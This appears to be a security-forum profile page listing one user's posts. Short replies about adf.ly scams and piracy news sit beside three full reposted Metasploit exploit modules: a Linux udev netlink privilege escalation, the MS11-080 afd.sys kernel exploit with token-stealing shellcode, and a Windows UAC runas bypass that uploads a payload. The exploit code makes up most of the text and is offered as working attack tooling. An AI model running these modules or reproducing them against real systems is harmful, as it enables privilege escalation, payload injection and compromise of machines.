Everything posted by Nytro
-
They aren't. Usually, people who run Linux are serious people who don't deal with that kind of crap.
-
For 1, 2 and 3, try to figure it out yourself, that's the whole charm. Point 4 is a bit ambiguous, it depends on which server you download from; the networking stack on Linux should be better because it doesn't have the ("security") limitations that Windows has.
-
I have friends who bought cars with the money made from adf.ly, and one girl even said she got silicone implants with the money she earned! I say we all make accounts and help each other out. The adf.ly guys will NOT make us rich with 15 cents a month, BUT if we work hard we can get up to 2 dollars a month, and if we're patient, in 50 years we can buy cars (Dacias)! Whoever posts again about adf.ly, sharecash or other bullshit aimed at stupid kids gets banned.
-
Moved to the trash. Learn to work, not to steal other people's work. And stop putting the "RST" name on every piece of crap!
-
Give more details, you don't come across as a serious person. What programming language is it about, what does the project involve, and maybe even what amount of money we're talking about...
-
Stop with this crap, it's like you're 12 years old, getting excited over 5 cents that in 95% of cases you never receive; you'd earn more if you broke an arm and went begging...
-
The only useful and interesting tutorial in this category. I posted just for a "bump", so the other crappy pseudo-tutorials stop being visible.
-
Crap, it's probably not some Adobe Reader 0day. The file seems to be older than April, so I think it's fine. The antivirus probably detected the pieces of code present in the file; other than that I don't know what to say. Anyway, I think this book is worth reading.
-
Poll for checking old active users
Nytro replied to a topic in Anunturi importante
Done. Topic closed.
-
Hey, look in the source code, if you can somehow read it, at how that md5 is generated.
-
Save hash + result in a database if you're not already doing that.
-
And they took your projects, right? Eh, I don't think there will be any problem with them being used for commercial purposes, or with them not acknowledging your copyright, or with them "stealing" the idea, because in the end that's about all that matters; anyone can do the implementation. PS: It kills me that they attach the term "hack" to every piece of crap. But I made sure to point out a small detail here: http://en.wikipedia.org/wiki/Hackathon : "Today, this term is not related to "hacking", it is just a programming marathon.". Damn it.
-
Pff, could it be the XSS protection? And it tells you it wasn't executed?
-
Yeah, 50 dollars a month, something like that, a cartload of money, we bought cars with that money...
-
False. There were some, but it wasn't exactly millions of euros that came out of it, rather very, very little.
-
Pumba: $acces_list = array(3871, 1, 528, 1348, 22968); Whoever really needs access tells me the reason and we'll see.
-
Whoa, how cool. YES, if you decrypt that string of characters you'll see who the "culprit" is. It's something with "jSoN".
-
Send a PM to the user "tex" from here, describing your passion for manele, and he will help you.
-
The Pirate Bay has moved to the cloud
by Liviu Petrescu | 18 October 2012
To avoid police raids, the torrent site The Pirate Bay is moving to the cloud. The Swedish pirates are giving up servers completely. This way, continuous availability is ensured, and maintenance costs drop significantly. After a difficult period for The Pirate Bay, with technical problems but also legal problems for the site's founders, the torrents are going into the cloud, writes CNET. Giving up servers in favour of cloud storage ensures the uninterrupted operation of The Pirate Bay, because its data will be stored on servers located on several continents, easy to swap out. The Pirate Bay's "ascent" into the cloud also makes any effort to shut down the site harder, as long as its database is encrypted and hidden across numerous cloud servers. If The Pirate Bay's move is followed by other sites that distribute pirated content, the fight against online piracy will get harder.
Source: The Pirate Bay has moved to the cloud | Hit.ro
All respect to the guys
-
http://gifura.orzhk.org/src/1332235315120.swf
-
The HTTP requests to /pagina.php ?
-
Linux udev Netlink Local Privilege Escalation

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'

#load 'lib/msf/core/post/file.rb'
#load 'lib/msf/core/exploit/local/unix.rb'
#load 'lib/msf/core/exploit/local/linux.rb'
#load 'lib/msf/core/exploit/local/linux_kernel.rb'

class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::Local::LinuxKernel
  include Msf::Exploit::Local::Linux
  include Msf::Exploit::Local::Unix

  def initialize(info={})
    super( update_info( info, {
      'Name'           => 'Linux udev Netlink Local Privilege Escalation',
      'Description'    => %q{
        Versions of udev < 1.4.1 do not verify that netlink messages are coming
        from the kernel. This allows local users to gain privileges by sending
        netlink messages from userland.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'kcope',         # discovery
          'Jon Oberheide', # 95-udev-late.rules technique
          'egypt'          # metasploit module
        ],
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'References'     =>
        [
          [ 'CVE', '2009-1185' ],
          [ 'OSVDB', '53810' ],
          [ 'BID', '34536' ]
        ],
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ],
          #[ 'Command payload', { 'Arch' => ARCH_CMD } ],
        ],
      'DefaultOptons'  => { 'WfsDelay' => 2 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => "",
    }
    ))
    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
      OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]),
    ], self.class)
  end

  def exploit
    if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0
      netlink_pid = datastore["NetlinkPID"]
    else
      print_status("Attempting to autodetect netlink pid...")
      netlink_pid = autodetect_netlink_pid
    end

    if not netlink_pid
      print_error "Couldn't autodetect netlink PID, try specifying it manually."
      print_error "Look in /proc/net/netlink for a PID near that of the udevd process"
      return
    else
      print_good "Found netlink pid: #{netlink_pid}"
    end

    sc = Metasm::ELF.new(@cpu)
    sc.parse %Q|
      #define DEBUGGING
      #define NULL ((void*)0)
      #ifdef __ELF__
      .section ".bss" rwx
      .section ".text" rwx
      .entrypoint
      #endif
      call main
      push eax
      call exit
    |

    # Set up the same include order as the bionic build system.
    # See external/source/meterpreter/source/bionic/libc/Jamfile
    cparser.lexer.include_search_path = [
      "external/source/meterpreter/source/bionic/libc/include/",
      "external/source/meterpreter/source/bionic/libc/private/",
      "external/source/meterpreter/source/bionic/libc/bionic/",
      "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/",
      "external/source/meterpreter/source/bionic/libc/kernel/common/",
      "external/source/meterpreter/source/bionic/libc/arch-x86/include/",
    ]
    cparser.parse(%Q|
      #define DEBUGGING
      // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h
      #ifndef __extension__
      #define __extension__
      #endif
      // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h
      // Doing #if on an undefined macro is fine in GCC, but a parse error in
      // metasm.
      #ifndef __STDC__
      #define __STDC__ 0
      #endif
      #include <sys/types.h>
      #include <stdarg.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <errno.h>
    |)
    [
      "external/source/meterpreter/source/bionic/libc/bionic/__errno.c",
      "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c",
      "external/source/meterpreter/source/bionic/libc/stdio/stdio.c",
    ].each do |fname|
      cparser.parse(File.read(fname), fname)
    end

    payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}"
    evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}"

    unix_socket_h(sc)
    linux_x86_syscall_wrappers(sc)

    main = %Q^
      #include <string.h>
      #include <linux/netlink.h>
      #define NULL 0

      int main() {
        int sock;
        struct iovec iov;
        struct sockaddr_nl sa;
        struct msghdr msg;
        char *mp;
        char message[4096];

        memset(sa, 0, sizeof(sa));
        sa.nl_family = AF_NETLINK;
        sa.nl_pid = #{netlink_pid};
        sa.nl_groups = 0;

        memset(&msg, 0x00, sizeof(struct msghdr));
        msg.msg_name = (void *)&sa;
        msg.msg_namelen = sizeof(sa);
        msg.msg_iov = &iov;
        msg.msg_iovlen = 1;
        msg.msg_control = NULL;
        msg.msg_controllen = 0;
        msg.msg_flags = 0;

        sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(sock, (struct sockaddr *) &sa, sizeof(sa));

        mp = message;
        mp += sprintf(mp, "remove@/d") + 1;
        mp += sprintf(mp, "SUBSYSTEM=block") + 1;
        mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1;
        mp += sprintf(mp, "TIMEOUT=10") + 1;
        mp += sprintf(mp, "ACTION=remove") +1;
        mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1;

        iov.iov_base = (void*)message;
        iov.iov_len = (int)(mp-message);

        sendmsg(sock, &msg, 0);
        close(sock);
        return 0;
      }
    ^
    cparser.parse(main, "main.c")

    asm = cpu.new_ccompiler(cparser, sc).compile
    sc.parse asm
    sc.assemble

    begin
      elf = sc.encode_string
    rescue
      print_error "Metasm Encoding failed: #{$!}"
      elog "Metasm Encoding failed: #{$!.class} : #{$!}"
      elog "Call stack:\n#{$!.backtrace.join("\n")}"
      return
    end

    pl = payload.encoded_exe
    print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}"
    write_file(payload_path, pl)
    print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}"
    write_file(evil_path, elf)
    print_status "chmod'ing and running it..."
    cmd_exec("chmod 755 #{evil_path} #{payload_path}")
    cmd_exec("#{evil_path}")
    rm_f(evil_path, payload_path)
  end

  def autodetect_netlink_pid
    netlink_pid = nil
    case session.type
    when "meterpreter"
      print_status("Meterpreter session, using get_processes to find netlink pid")
      process_list = session.sys.process.get_processes
      udev_proc = process_list.find {|p| p["name"] =~ /udevd/ }
      udev_pid = udev_proc["pid"]
      print_status "udev pid: #{udev_pid}"
      netlink = read_file("/proc/net/netlink")
      netlink.each_line do |line|
        pid = line.split(/\s+/)[2].to_i
        if pid == udev_pid - 1
          netlink_pid = pid
          break
        end
      end
    else
      print_status("Shell session, trying sh script to find netlink pid")
      netlink_pid = cmd_exec( %q^
        for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do
          for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do
            [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ;
          done;
        done
      ^)
      netlink_pid = nil if netlink_pid.empty?
    end
    netlink_pid
  end
end
```

Source: Linux udev Netlink Local Privilege Escalation
-
MS11-080 AfdJoinLeaf Privilege Escalation

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking
  # Average because this module relies on memory corruption within the
  # kernel, this is inherently dangerous. Also if the payload casues
  # the system process that it was injected into to die then it's also
  # possible that the system may become unstable.

  include Msf::Post::Common
  include Msf::Post::Windows::Priv

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS11-080 AfdJoinLeaf Privilege Escalation',
      'Description'    => %q{
        This module exploits a flaw in the AfdJoinLeaf function of the afd.sys
        driver to overwrite data in kernel space. An address within the
        HalDispatchTable is overwritten and when triggered with a call to
        NtQueryIntervalProfile will execute shellcode. This module will elevate
        itself to SYSTEM, then inject the payload into another SYSTEM process
        before restoring it's own token to avoid causing system instability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matteo Memelli',  # original exploit and all the hard work
          'Spencer McIntyre' # MSF module
        ],
      'Arch'           => [ ARCH_X86 ],
      'Platform'       => [ 'windows' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Windows XP SP2 / SP3',
            {
              'HaliQuerySystemInfo'      => 0x16bba,
              'HalpSetSystemInformation' => 0x19436,
              '_KPROCESS'                => "\x44",
              '_TOKEN'                   => "\xc8",
              '_UPID'                    => "\x84",
              '_APLINKS'                 => "\x88"
            }
          ],
          [ 'Windows Server 2003 SP2',
            {
              'HaliQuerySystemInfo'      => 0x1fa1e,
              'HalpSetSystemInformation' => 0x21c60,
              '_KPROCESS'                => "\x38",
              '_TOKEN'                   => "\xd8",
              '_UPID'                    => "\x94",
              '_APLINKS'                 => "\x98"
            }
          ],
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2005' ],
          [ 'MSB', 'MS11-080' ],
          [ 'EDB', 18176 ],
          [ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ]
        ],
      'DisclosureDate' => 'Nov 30 2011',
      'DefaultTarget'  => 0
    }))

    register_options([
    ])
  end

  def find_sys_base(drvname)
    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [
      ["PBLOB", "lpImageBase", "out"],
      ["DWORD", "cb", "in"],
      ["PDWORD", "lpcbNeeded", "out"]])
    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [
      ["LPVOID", "ImageBase", "in"],
      ["PBLOB", "lpBaseName", "out"],
      ["DWORD", "nSize", "in"]])

    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
      current_drvname = results['lpBaseName'][0..results['return'] - 1]
      if drvname == nil
        if current_drvname.downcase.include?('krnl')
          return [address, current_drvname]
        end
      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
        return [address, current_drvname]
      end
    end
  end

  # Function borrowed from smart_hashdump
  def get_system_proc
    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
    local_sys = resolve_sid("S-1-5-18")
    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"

    # Processes that can Blue Screen a host if migrated in to
    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
    session.sys.process.processes.each do |p|
      # Check we are not migrating to a process that can BSOD the host
      next if dangerous_processes.include?(p["name"])
      next if p["pid"] == session.sys.process.getpid
      next if p["pid"] == 4
      next if p["user"] != system_account_name
      return p
    end
  end

  def exploit
    if sysinfo["Architecture"] =~ /wow64/i
      print_error("Running against WOW64 is not supported")
      return
    elsif sysinfo["Architectore"] =~ /x64/
      print_error("Running against 64-bit systems is not supported")
      return
    end

    mytarget = target
    if mytarget.name =~ /Automatic/
      os = sysinfo["OS"]
      if os =~ /windows xp/i
        mytarget = targets[1]
      end
      if ((os =~ /2003/) and (os =~ /service pack 2/i))
        mytarget = targets[2]
      end
      if ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
        mytarget = targets[2]
      end
      if mytarget.name =~ /Automatic/
        print_error("Could not identify the target system, it may not be supported")
        return
      end
      print_status("Running against #{mytarget.name}")
    end

    if is_system?
      print_error("This meterpreter session is already running as SYSTEM")
      return
    end

    this_proc = session.sys.process.open
    kernel_info = find_sys_base(nil)
    base_addr = 0x1001
    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")

    result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0)
    socket = result['return']

    irpstuff = rand_text_alpha(8)
    irpstuff << "\x00\x00\x00\x00"
    irpstuff << rand_text_alpha(4)
    irpstuff << "\x01\x00\x00\x00"
    irpstuff << "\xe8\x00" + "4" + "\xf0\x00"
    irpstuff << rand_text_alpha(231)

    if not this_proc.memory.writable?(0x1000)
      session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [
        ["DWORD", "ProcessHandle", "in"],
        ["PBLOB", "BaseAddress", "inout"],
        ["PDWORD", "ZeroBits", "in"],
        ["PBLOB", "RegionSize", "inout"],
        ["DWORD", "AllocationType", "in"],
        ["DWORD", "Protect", "in"]
      ])
      result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
    end

    if not this_proc.memory.writable?(0x1000)
      print_error('Failed to properly allocate memory')
      return
    end

    this_proc.memory.write(0x1000, irpstuff)

    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
    hKernel = hKernel['return']
    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    halDispatchTable = halDispatchTable['return']
    halDispatchTable -= hKernel
    halDispatchTable += kernel_info[0]
    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")

    halbase = find_sys_base("hal.dll")[0]
    haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
    halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
    print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
    print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")

    #### Exploitation ####
    shellcode_address_dep = 0x0002071e
    shellcode_address_nodep = 0x000207b8
    padding = make_nops(2)
    halDispatchTable0x4 = halDispatchTable + 0x4
    halDispatchTable0x8 = halDispatchTable + 0x8

    restore_ptrs = "\x31\xc0"
    restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("L")
    restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("L")
    restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("L")
    restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("L")

    tokenstealing = "\x52"
    tokenstealing << "\x53"
    tokenstealing << "\x33\xc0"
    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
    tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
    tokenstealing << "\x8b\xc8"
    tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
    tokenstealing << "\x89\x1d\x00\x09\x02\x00"
    tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
    tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
    tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
    tokenstealing << "\x75\xe8"
    tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
    tokenstealing << "\x8b\xc1"
    tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
    tokenstealing << "\x5b"
    tokenstealing << "\x5a"
    tokenstealing << "\xc2\x10"

    restore_token = "\x52"
    restore_token << "\x33\xc0"
    restore_token << "\x64\x8b\x80\x24\x01\x00\x00"
    restore_token << "\x8b\x40" + mytarget['_KPROCESS']
    restore_token << "\x8b\x15\x00\x09\x02\x00"
    restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
    restore_token << "\x5a"
    restore_token << "\xc2\x10"

    shellcode = padding + restore_ptrs + tokenstealing
    this_proc.memory.write(shellcode_address_dep, shellcode)
    this_proc.memory.write(shellcode_address_nodep, shellcode)
    this_proc.memory.protect(0x00020000)

    addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!")
    result = session.railgun.ws2_32.connect(socket, addr, addr.length)
    if result['return'] != 0xffffffff
      print_error("The socket is not in the correct state")
      return
    end

    session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [
      [ "DWORD", "FileHandle", "in" ],
      [ "DWORD", "Event", "in" ],
      [ "DWORD", "ApcRoutine", "in" ],
      [ "DWORD", "ApcContext", "in" ],
      [ "PDWORD", "IoStatusBlock", "out" ],
      [ "DWORD", "IoControlCode", "in" ],
      [ "LPVOID", "InputBuffer", "in" ],
      [ "DWORD", "InputBufferLength", "in" ],
      [ "LPVOID", "OutputBuffer", "in" ],
      [ "DWORD", "OutPutBufferLength", "in" ]
    ])
    session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [
      [ "DWORD", "ProfileSource", "in" ],
      [ "PDWORD", "Interval", "out" ]
    ])

    print_status("Triggering AFDJoinLeaf pointer overwrite...")
    result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    if not is_system?
      print_error("Exploit failed")
      return
    end

    begin
      proc = get_system_proc
      print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}")
      host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS)
      mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024))
      print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}")
      host_process.memory.write(mem, payload.encoded)
      host_process.thread.create(mem, 0)
    rescue ::Exception => e
      print_error("Failed to Inject Payload")
      print_error(e.to_s)
    end

    # Restore the token because apparently BSODs are frowned upon
    print_status("Restoring the original token...")
    shellcode = padding + restore_ptrs + restore_token
    this_proc.memory.write(shellcode_address_dep, shellcode)
    this_proc.memory.write(shellcode_address_nodep, shellcode)
    result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
  end
end
```

Source: MS11-080 AfdJoinLeaf Privilege Escalation
-
Windows Escalate UAC Execute RunAs

```ruby
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Common
  include Exploit::EXE
  include Post::File

  def initialize(info={})
    super( update_info( info,
      'Name'           => 'Windows Escalate UAC Execute RunAs',
      'Description'    => %q{
        This module will attempt to elevate execution level using
        the ShellExecute undocumented RunAs flag to bypass low UAC settings.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mubix <mubix[at]hak5.org>' # Port to local exploit
        ],
      'Version'        => '$Revision$',
      'Platform'       => [ 'windows' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [ [ 'Windows', {} ] ],
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
        ],
      'DisclosureDate' => "Jan 3, 2012"
    ))

    register_options([
      OptString.new("FILENAME", [ false, "File name on disk"]),
      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
    ])
  end

  def exploit
    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
    open_key = session.sys.registry.open_key(root_key, base_key)
    lua_setting = open_key.query_value('EnableLUA')

    if lua_setting.data == 1
      print_status "UAC is Enabled, checking level..."
    else
      print_good "UAC is not enabled, no prompt for the user"
    end

    uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
    case uac_level.data
    when 2
      print_status "UAC is set to 'Always Notify'"
      print_status "The user will be prompted, wait for them to click 'Ok'"
    when 5
      print_debug "UAC is set to Default"
      print_debug "The user will be prompted, wait for them to click 'Ok'"
    when 0
      print_good "UAC is not enabled, no prompt for the user"
    end

    #
    # Generate payload and random names for upload
    #
    payload = generate_payload_exe

    if datastore["FILENAME"]
      payload_filename = datastore["FILENAME"]
    else
      payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    end

    if datastore["PATH"]
      payload_path = datastore["PATH"]
    else
      payload_path = session.fs.file.expand_path("%TEMP%")
    end
    cmd_location = "#{payload_path}\\#{payload_filename}"

    if datastore["UPLOAD"]
      print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
      fd = session.fs.file.new(cmd_location, "wb")
      fd.write(payload)
      fd.close
    end

    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
  end
end
```

Source: Windows Escalate UAC Execute RunAs + http://www.exploit-db.com/exploits/21845/